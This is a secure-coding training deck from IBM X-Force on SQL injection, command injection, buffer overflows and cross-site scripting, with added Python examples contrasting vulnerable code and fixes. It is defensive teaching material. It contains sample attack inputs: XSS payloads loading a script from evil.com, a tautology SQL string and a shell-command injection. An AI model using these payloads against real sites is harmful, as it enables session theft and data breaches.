uncover what's inside the mind of a hacker
Inside the Mind of a Hacker
PAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM
The Price of a Security Bug
INTRODUCTION
3 IBM Security
Functionality vs. Security
• As developers we want to create highly functional software, unrestricted by the constraints of compliance standards and tedious business processes.
• Product security is incorrectly perceived to be a burden on agile software development.
• Security measures are often an afterthought: something you have to do, not something you want to do.
[Chart: security plotted against functionality, with axes running from Low Security to High Security and from Low Functionality to High Functionality]
Developing Secure and Highly Functional Products is Possible
• If done early in the development lifecycle, security is not hard or costly, and it does not conflict with functionality.
• This can be achieved by educating developers about threats.
[Chart: the same security-versus-functionality plot, annotated "Not accurate"]
What is a 0-day?
• A zero-day is an unpublished security bug that has become known to a malicious party
• Commonly found in widely used software
Meet The Hackers Who Sell Spies The Tools To Crack Your PC
"Vupen's chief executive and lead hacker, Chaouki Bekrar, says his company never had any intention of telling Google its secret techniques, certainly not for $60,000 in chump change."
ANDY GREENBERG, FORBES
The Security Vulnerability Business
• VUPEN – specializing in selling zero-days to the highest bidder
• Refused the Pwn2Own $60k prize because the zero-day was worth more undisclosed
Bug Poaching
• As uncovered recently by IBM X-Force, web application flaws are being used in ransomware-style attacks.
• 30 enterprise organizations were targeted last year.
• Attackers find and exploit website vulnerabilities.
• SQL Injection is the main method of attack.
• Once they obtain sensitive data, attackers store it on a cloud service.
• An email is sent to the organization that links to the data as proof that the attacker has penetrated the network.
• Attackers ask for large payments, $30k+, to reveal the flaws.
Types of Hackers
• White-hat hackers
  – abide by the rules of responsible disclosure
  – notify companies about vulnerabilities before making them public
  – don't require any reward other than recognition for identifying the issue
  – also referred to as ethical hackers
• Gray-hat hackers
  – operate at the boundary of the law
  – may be selling zero-day vulnerabilities to the bad guys or to governments
• Black-hat hackers
  – they are the cybercriminals
  – use zero-days to break into systems and steal data
What would a Hacker do?
• Understanding common programming flaws helps developers prevent security issues
• Getting into the hacker mindset makes it possible to identify abuse cases
• Implementing software defenses while the software is being written reduces cost and can avoid thousands of dollars in damages
• You can cost the black hats and gray hats lots of money, because they won't have 0-days to sell!
The Top Programming Flaws
• Two widely used lists: the OWASP Top 10 and the MITRE (SANS) Top 25.
• The MITRE Top 25 focuses on software mistakes.

#  CWE      Name
1  CWE-89   Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
2  CWE-78   Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
3  CWE-120  Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
4  CWE-79   Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

SQL Injection
ATTACKING THE DATABASE
The 15 worst data security breaches of the 21st Century
"134 million credit cards exposed through SQL injection to install spyware on Heartland's data systems"
TAYLOR ARMERDING, WWW.CSOONLINE.COM
The Worst Data Breach of the 21st Century
• In comparison, the OPM hack was 21.5 million records
• In 2012, SQLi was responsible for more than half of all data breaches where the attack type was disclosed, according to IBM X-Force
• User input is concatenated into a database query
• Attackers can manipulate the query, effectively injecting SQL code and altering the functionality of the application
• Attackers can even execute OS commands
What is the programming flaw?
• Java PreparedStatement example, removing the need for concatenation
Preventing SQL Injection with Parameterized Statements
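The two slides above describe the flaw (query text built by concatenation) and the fix (a prepared statement); the slide's own Java code did not survive extraction. The following is an added example written for this page, not the presenter's code, using Python's built-in sqlite3 module in place of Java JDBC. The user table, its two rows and the tampered input are constructed for the example.

```python
import sqlite3


def build_db():
    # Constructed in-memory user table standing in for the application's
    # database; the rows are sample data for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    # The flaw: user input is concatenated into the query text, so whatever
    # the user typed is parsed by the database as part of the SQL statement.
    query = ("SELECT name FROM users WHERE name = '" + user
             + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn, user, password):
    # Parameterized statement (the sqlite3 equivalent of a Java
    # PreparedStatement): the SQL text is fixed and the values are bound
    # separately, so the database never interprets them as SQL syntax.
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (user, password))]


def demo():
    # Same tampered password string against both implementations.
    conn = build_db()
    tampered = "' OR '1'='1"   # constructed input that contains SQL syntax
    return {
        "vulnerable": login_vulnerable(conn, "alice", tampered),
        "parameterized": login_parameterized(conn, "alice", tampered),
        "legitimate": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

With concatenation the tampered string turns the WHERE clause into `name = 'alice' AND password = '' OR '1'='1'`, which is true for every row, so the "login" returns all users; with a bound parameter the same string is compared as a literal password and matches nothing.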
• Many user-provided parameters only need to be alphanumeric
• Input validation whitelisting – alphanumeric by default, special characters by exception
• This reduces the attack surface for many types of attacks, not only SQL Injection
• Implement an input validation framework
Adding Input Validation to Prevent Injection
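The bullets above describe a whitelist policy (alphanumeric by default, special characters only where a field needs them) applied through a framework rather than ad hoc checks. The code below is an added example written for this page, not code from the presentation or from any IBM product; the field names, patterns and length limits are constructed assumptions.

```python
import re

# Default rule: alphanumeric only, with a bounded length.  Anything else is
# rejected unless the field has an explicit exception below.
DEFAULT_RULE = re.compile(r"[A-Za-z0-9]{1,64}")

# Per-field exceptions.  Each spells out exactly which extra characters are
# allowed; the names and patterns are constructed for this example.
FIELD_RULES = {
    "userid": re.compile(r"[0-9]{1,10}"),                                  # numeric id only
    "email": re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}"),   # needs @ . and a few symbols
    "comment": re.compile(r"[A-Za-z0-9 .,!?'-]{0,500}"),                   # free text, still no < > ; " or \
}


class ValidationError(ValueError):
    """Raised for any parameter that does not match its whitelist rule."""


def validate_field(name, value):
    """Return the value unchanged if it matches the rule for this field, else raise."""
    rule = FIELD_RULES.get(name, DEFAULT_RULE)
    if not isinstance(value, str) or rule.fullmatch(value) is None:
        raise ValidationError(f"parameter {name!r} failed input validation")
    return value


def validate_request(params):
    """Validate every parameter of a request up front, so handlers only ever
    see clean values.  Unknown parameters fall back to the alphanumeric default."""
    return {name: validate_field(name, value) for name, value in params.items()}


def is_valid(name, value):
    try:
        validate_field(name, value)
        return True
    except ValidationError:
        return False


if __name__ == "__main__":
    print(validate_request({"userName": "alice42", "userid": "7", "email": "alice@example.test"}))
```

Because the default rule admits no quotes, semicolons, angle brackets or backslashes, a single validation layer in front of the handlers blocks the characters that SQL injection, command injection and cross-site scripting all depend on, before any of the later context-specific defenses are reached.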
OS Command Injection
ATTACKING THE SHELL
Web attacks build on Shellshock bug
One group used their Shellshock botnet to bombard machines run by Akamai with huge amounts of junk data to try to knock them offline.
WWW.BBC.COM
The Famous 0-Day
• The 2014 Shellshock bug affected millions of servers around the world
• It has its own logo and Wikipedia article.
• The software concatenates or substitutes user input into a shell command.
• The example below is from the recently disclosed "ImageTragick" bug
• The %M part is substituted with a user-provided link. If a graphics file contains a link like this:
• The software executes:
What is the programming flaw?
• Use input validation
• Use parameterized functions, where user input is passed as a parameter rather than as part of one full command string
Preventing Command Injection
[Code comparison: Vulnerable | Using a Parameterized Function]
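The side-by-side code from the slide did not survive extraction. What follows is an added example written for this page, not the presenter's code and not ImageMagick's real delegate configuration: a constructed command template with a %M placeholder illustrates the substitution flaw, and a Python child process that echoes its first argument stands in for the real fetch tool so the example runs offline. The link value and the whitelist pattern are assumptions made for the example.

```python
import re
import subprocess
import sys

# Constructed stand-in for a delegate command template of the ImageTragick
# kind: %M is replaced with a link taken from the input file.
TEMPLATE = "fetch-image %M -o /tmp/out.png"


def build_shell_command(link):
    # The flaw: untrusted text is substituted into a command string that a
    # shell will parse, so a ';' in the link ends one command and starts
    # another.  Returned for inspection only; it is never executed here.
    return TEMPLATE.replace("%M", link)


def run_with_argv(link):
    # Parameterized execution: the link is a single argv element and no shell
    # is involved, so metacharacters inside it are just characters.  The child
    # process (a Python one-liner echoing argv[1]) models the real tool.
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", link]
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


# Whitelist for the link itself: http(s) scheme plus a small, explicit
# character set.  Constructed for the example; tighten it for a real deployment.
LINK_RULE = re.compile(r"https?://[A-Za-z0-9.\-_/]{1,2048}")


def fetch_image(link):
    # Both defenses from the slide together: validate the input first, then
    # pass it as a parameter rather than as part of a command line.
    if LINK_RULE.fullmatch(link) is None:
        raise ValueError("link rejected by input validation")
    return run_with_argv(link)


if __name__ == "__main__":
    sample = "https://example.test/a.png; echo injected"   # constructed input
    print("shell string would be:", build_shell_command(sample))
    print("argv delivers the whole link intact:", run_with_argv(sample))
```

The vulnerable template turns the constructed link into `fetch-image https://example.test/a.png; echo injected -o /tmp/out.png`, two commands as far as a shell is concerned; passed through argv, the same string reaches the child as one intact argument, and the whitelist rejects it before it gets that far.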
Buffer Overflow
ATTACKING THE MEMORY
• A contest held during the CanSecWest security conference.
• Payouts topped $500,000 in 2014, with over a dozen new vulnerabilities found in Adobe Reader, Adobe Flash Player, Internet Explorer 11, Google Chrome and Mozilla Firefox
• Many of the zero-days disclosed at Pwn2Own are memory flaws: for example, CVE-2012-1876, a buffer overflow in Internet Explorer, or CVE-2014-1303, a buffer overflow in Apple Safari.
• Using such a vulnerability gives the attacker complete control over the victim's machine.
• For these reasons, memory flaws found in common software are extremely valuable on the black market.
Pwn2Own
Chinese Hackers Compromised Forbes.com Using IE, Flash Zero Days
Chinese APT group uses IE, Flash zero days to compromise Forbes.com
CHRIS BROOK, WWW.THREATPOST.COM
Using Software Flaws in Cyber Espionage
• Buffer overflows are caused by improper memory management in C/C++ code
• Example: a simple C program that validates a password
• The code does not validate the length of the user input and does not ensure that sufficient memory was allocated to store the data coming from the user
What is the programming flaw?
• The table below shows the memory representation of our vulnerable program, where \0 stands for the null character
• If the user enters more than 16 "A" characters as the verification password, the extra characters overwrite the information stored at address 0x0111
Overflowing the buffer
• The attacker could overwrite the section of memory that holds instructions, causing the execution of arbitrary code, as shown in the simplistic representation below.
Overflowing the program instructions
• Use safe functions. For example, fgets(...) lets you limit the size of the input; fgets(userPass, 16, stdin) resolves the problem.
• Ensure that the size of the input matches the size of the allocated memory.
• Avoid using user input as a format string argument. This can lead to another memory flaw: format string injection.
• Be careful both when allocating and when releasing memory. Use-after-free is another type of memory flaw, where the program keeps a reference to a memory location after it has been freed; data at that location can be arbitrarily modified.
• Use safe compiler flags. Such flags enable operating system defenses that make the insertion of arbitrary commands very difficult. For example, Address Space Layout Randomization (ASLR) is a Windows protection mechanism.
Protecting From Memory Attacks
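The slides above walk through the memory table of the vulnerable password check (a 16-byte userPass buffer, the byte at 0x0111 overwritten once more than 16 characters arrive) and the fgets fix. The code below is an added example for this page, not the presenter's C program: it is a Python simulation of that table, with a byte array playing the role of the stack, so that the unbounded copy and the fgets-style bounded read can be compared side by side. The addresses and region size are constructed to mirror the slide; real C memory behaviour, compiler layout and the instruction-overwrite case are outside what this model shows.

```python
# Simplified model of the slide's memory table.  Index 0 of the byte array is
# address 0x0100, where the 16-byte userPass buffer starts; the byte at
# 0x0111 stands for data the program later trusts.  Constructed layout.
BUFFER_ADDR = 0x0100
BUFFER_SIZE = 16
TRUSTED_ADDR = 0x0111
REGION_SIZE = 0x40            # how much "stack" the model keeps track of


def fresh_stack():
    return bytearray(REGION_SIZE)   # every byte starts out as \0


def addr_to_index(addr):
    return addr - BUFFER_ADDR


def _store(stack, data):
    # Write bytes starting at the buffer; refuse to model writes that would
    # leave the region entirely (real hardware would just keep going).
    if len(data) > REGION_SIZE:
        raise IndexError("write runs past the modelled stack region")
    stack[0:len(data)] = data
    return stack


def unsafe_read(stack, user_input):
    # What gets()/strcpy() do: copy every byte plus the terminating \0 with
    # no knowledge of how large the destination buffer is.
    return _store(stack, user_input.encode() + b"\0")


def fgets_read(stack, user_input, n=BUFFER_SIZE):
    # fgets(userPass, n, stdin): store at most n-1 bytes, then always append
    # \0, so the write can never extend past an n-byte buffer.
    return _store(stack, user_input.encode()[: n - 1] + b"\0")


def trusted_byte_after(reader, user_input):
    """Perform one read into a fresh stack and return the byte left at 0x0111
    (0 means the read never touched it)."""
    stack = reader(fresh_stack(), user_input)
    return stack[addr_to_index(TRUSTED_ADDR)]


def buffer_contents(stack):
    return bytes(stack[:BUFFER_SIZE])


if __name__ == "__main__":
    for count in (16, 17, 18):
        print(count, "A's via gets-style copy ->",
              hex(trusted_byte_after(unsafe_read, "A" * count)),
              "| via fgets ->", hex(trusted_byte_after(fgets_read, "A" * count)))
```

Sixteen A's fill the buffer and place the terminator at 0x0110; the seventeenth pushes the terminator onto 0x0111 and the eighteenth puts an 'A' (0x41) there, which is the overwrite the table describes. With fgets and n = 16 the write stops after 15 characters plus the terminator, so 0x0111 keeps its original value no matter how long the input is.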
Cross-Site Scripting
ATTACKING THE WEB PAGE
"Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability."
TWITTER COMMUNIQUE, APR 11, 2009
The XSS Worm
• A malicious Cross-Site Scripting (XSS) script spread itself from user to user by modifying each user's profile
• Other social networking sites were notably affected by XSS worms: the Samy worm affected 1 million MySpace users in 2005
• The attack is also commonly used to spoof websites and steal passwords; major online retailers have been targeted.
• XSS occurs when the web page inserts user input in an unsafe context
• Example unsafe contexts:
  – During server-side page generation:
    User name: <%=request.getParameter("userName")%>
    becomes: User name: <script src="https://evil.com/attack.js"></script>
  – During server-side page generation, inside a JavaScript attribute:
    <body onload="loadProfile(<%=request.getParameter('userid')%>)">
    becomes: <body onload="loadProfile(1);eval("var a=document.createElement(\"script\");a.src=\"https://evil.com/attack.js\";document.body.appendChild(a);")">
  – During server-side page generation, inside a JavaScript snippet:
    <script>loadProfile(<%=request.getParameter('userid')%>)</script>
  – Dynamic updates of the innerHTML element property: userNameDiv.innerHTML = user.Name;
• Because XSS can affect so many areas of a page, it is difficult to defend against and easy to miss.
What is the programming flaw?
• HtmlEncode user input before introducing it into an unsafe context.
• Dynamic page updates should set the innerText / textContent property of HTML nodes
• Enforcing request token checks can prevent reflected cross-site scripting because the page will expire. It will also prevent
• Use secure headers:
  – X-XSS-Protection: 1; mode=block – enforces the browser XSS filter
  – Content-Security-Policy: script-src 'self' – prevents loading external scripts
Protecting From Web Page Attacks
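The unsafe contexts on the previous slide (HTML body, JavaScript attribute argument, JavaScript snippet) each need their own treatment, and the defenses above name HTML encoding plus the two response headers. The code below is an added example written for this page, not the presenter's JSP code: it renders the same three fragments safely in Python using the standard library. The function names, the numeric whitelist for userid and the attack string used in the usage block are assumptions made for the example.

```python
import html
import json
import re

# userid on the slide is a number, so whitelist it instead of relying on
# encoding alone (constructed rule for this example).
USERID_RULE = re.compile(r"[0-9]{1,10}")


def render_user_name(user_name):
    # HTML body context: encode before inserting into page markup.  '<', '>',
    # '&' and both quote characters come out as entities.
    return "User name: " + html.escape(user_name, quote=True)


def render_onload(userid):
    # JavaScript attribute context: loadProfile() takes a number, so anything
    # that is not digits is rejected; the value is emitted as an int so no
    # characters from the request ever reach the attribute.
    if USERID_RULE.fullmatch(userid) is None:
        raise ValueError("userid must be numeric")
    return f'<body onload="loadProfile({int(userid)})">'


def render_js_string(value):
    # JavaScript string context: json.dumps yields a quoted, escaped literal;
    # '<' and '>' are additionally hex-escaped so a value containing
    # "</script>" cannot terminate the enclosing script block.
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


# The two headers recommended on the slide, as a response-header mapping.
SECURE_HEADERS = {
    "X-XSS-Protection": "1; mode=block",
    "Content-Security-Policy": "script-src 'self'",
}


def secure_headers():
    return dict(SECURE_HEADERS)


if __name__ == "__main__":
    attack = '<script src="https://evil.com/attack.js"></script>'   # constructed input
    print(render_user_name(attack))
    print(render_js_string("</script>"))
    print(render_onload("1"))
    print(secure_headers())
```

The encoded user name arrives in the browser as literal text rather than a script element; the JavaScript string helper keeps injected markup inside the literal; and the attribute helper shows that for a value with a known shape, validation is simpler and safer than trying to encode for the attribute-inside-JavaScript context.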
Catching Software Flaws
DEFENDING AGAINST THE HACKERS
• AppScan is an application security scanner
• Tooling is available both as a cloud service and as an installable product
• It interacts with the application and conducts automated attacks
• In the screenshot you can see a scan of a server vulnerable to SQL Injection and OS Command Injection
Catching SQL Injection and Command Injection with Dynamic Analysis
• AppScan Source is a Static Analysis tool also available as a cloud service.
• It examines the program code to identify security issues.
• In the screenshot you can see a scan of the vulnerable sample program presented earlier
Catching Buffer Overflow with Static Analysis
© Copyright IBM Corporation 2016. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.